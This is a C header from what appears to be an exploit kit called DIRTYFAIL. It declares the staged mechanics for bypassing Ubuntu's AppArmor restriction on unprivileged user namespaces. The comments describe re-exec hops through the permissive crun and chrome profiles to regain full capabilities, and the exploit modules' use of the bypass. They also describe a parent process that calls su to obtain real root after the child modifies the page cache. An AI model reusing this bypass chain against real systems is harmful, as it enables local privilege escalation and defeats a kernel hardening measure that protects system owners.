114 lines
5.1 KiB
C
114 lines
5.1 KiB
C
/*
 * DIRTYFAIL — apparmor_bypass.h
 *
 * Defeat Ubuntu's `apparmor_restrict_unprivileged_userns=1` policy.
 *
 * The default Ubuntu AppArmor profile applied to unprivileged programs
 * lets `unshare(CLONE_NEWUSER)` succeed but **strips CAP_NET_ADMIN**
 * inside the new namespace — so XFRM SA registration, raw sockets, etc.
 * fail downstream even though we appear to be uid 0 in our userns.
 *
 * The bypass: switch to a permissive AppArmor profile (`crun`, `chrome`,
 * etc.) via `change_onexec` *before* unshare. Those profiles don't
 * carry the userns-cap-strip rule, so the kernel hands us the full
 * effective set inside the new namespace.
 *
 * Mechanics — three stages, two re-execs:
 *
 *   stage 0 (entry):     change_onexec(crun);   execv(self, AA1, ...args)
 *   stage 1 (in crun):   change_onexec(chrome); execv(self, AA2, ...args)
 *   stage 2 (in chrome): unshare(USER|NET); maps; capset; ambient caps;
 *                        re-enter normal main() flow with bypass marked
 *
 * The two-hop dance is what `aa-rootns` (Brad Spengler / 0xdeadbeef)
 * demonstrated. The "chrome" hop is technically optional — the "crun"
 * profile is already unconfined for our purposes — but the second hop
 * defeats some hardened policies that audit chained execs.
 *
 * Detection of "do we need the bypass?" is best-effort:
 *   - read /proc/self/attr/current; if it ends with " (enforce)" and
 *     mentions "unprivileged_userns", we're being restricted.
 *   - or: probe by spawning a child that does unshare(CLONE_NEWUSER)
 *     and tries `ip link add type dummy` — if that fails with EPERM,
 *     the caps were stripped.
 */
|
|
|
|
#ifndef DIRTYFAIL_APPARMOR_BYPASS_H
|
|
#define DIRTYFAIL_APPARMOR_BYPASS_H
|
|
|
|
#include "common.h"
|
|
|
|
/*
 * Stage markers. A re-exec'd image receives one of these as argv[1] so
 * that the re-exec can be routed to the matching bypass stage.
 */
#define AA_STAGE1_TAG "DIRTYFAIL-AA-STAGE-1"
#define AA_STAGE2_TAG "DIRTYFAIL-AA-STAGE-2"
|
|
|
|
/*
 * Report whether this invocation is one of the bypass re-execs.
 *
 * Returns true if argv[1] is one of the AA-* stage markers
 * (AA_STAGE1_TAG / AA_STAGE2_TAG), in which case main() should hand
 * control to apparmor_bypass_run_stage().
 */
bool apparmor_bypass_is_stage(int argc, char **argv);
|
|
|
|
/*
 * Execute the bypass stage selected by argv[1].
 *
 *   stage 1: re-execs self; the function does not return (always execv).
 *   stage 2: performs the unshare + caps setup, then returns 0 on
 *            success and writes the caller's continuation argv to
 *            *out_argc / *out_argv.
 *
 * NOTE(review): the value returned when stage 2 fails is not stated
 * here — confirm against the implementation before relying on it.
 */
int apparmor_bypass_run_stage(int argc, char **argv,
                              int *out_argc, char ***out_argv);
|
|
|
|
/*
 * Probe: does this process actually need the bypass to gain
 * CAP_NET_ADMIN inside a fresh user namespace?
 *
 * Returns true if the bypass IS needed.
 */
bool apparmor_bypass_needed(void);
|
|
|
|
/*
 * Report whether stage 2 of the bypass ran successfully in this process.
 *
 * Returns true iff it did — i.e. the process is now inside a fresh
 * user/net namespace with full caps, and any further unshare() would
 * nest. Exploit modules check this before deciding whether to
 * fork+unshare on their own.
 */
bool apparmor_bypass_was_armed(void);
|
|
|
|
/*
 * Probe whether this kernel denies caps to unprivileged user
 * namespaces regardless of bypass technique.
 *
 * Forks a child that does unshare(CLONE_NEWUSER) and tries to write to
 * /proc/self/setgroups; if that fails with EPERM, we're on a kernel
 * (Ubuntu 26.04+) that auto-transitions to the unprivileged_userns
 * sub-profile and denies caps regardless of bypass technique.
 *
 * Returns true if unprivileged userns is COMPREHENSIVELY blocked
 * (the bug class is unreachable for unprivileged users). Returns
 * false if userns operations work normally OR if AA isn't loaded
 * at all (in which case `apparmor_bypass_needed()` would also
 * return false).
 *
 * This is the right signal for `--scan` to report "VULNERABLE in
 * kernel but LSM-mitigated" vs plain "VULNERABLE".
 */
bool apparmor_userns_caps_blocked(void);
|
|
|
|
/*
 * Fork a child that arms the AA bypass and re-execs itself through
 * the stages.
 *
 * Child: eventually lands inside a fresh user/net namespace with full
 * caps; main() in that re-exec'd image dispatches to the inner-mode
 * handler indicated by the DIRTYFAIL_INNER_MODE environment variable.
 *
 * Parent: stays in the init namespace and waits for the child via
 * waitpid. After the child exits, the parent can read the global
 * page cache (which reflects whatever the child modified) and then
 * execlp("su", ...) in init namespace to reach REAL init-ns root —
 * this is the whole point of the outer/inner split.
 *
 * Precondition: the caller must setenv("DIRTYFAIL_INNER_MODE", "...", 1)
 * and any other mode-specific env vars BEFORE calling this. The child
 * inherits the full environment.
 *
 * Returns the child's exit code on success, -1 on fork failure.
 */
int apparmor_bypass_fork_arm(int argc, char **argv);
|
|
|
|
/*
 * Trigger the bypass: change_onexec(crun), then re-exec self with stage
 * markers.
 *
 * The caller passes the argv it wants to resume with; stage 2 hands
 * that argv back via apparmor_bypass_run_stage's out_argv.
 *
 * Does not return on success (control transfers to the new process
 * image). Returns -1 with errno set if the change_onexec or execv
 * failed; in that case the caller may continue without bypass and let
 * downstream syscalls fail loudly.
 */
int apparmor_bypass_arm_and_relaunch(int argc, char **argv);
|
|
|
|
#endif
|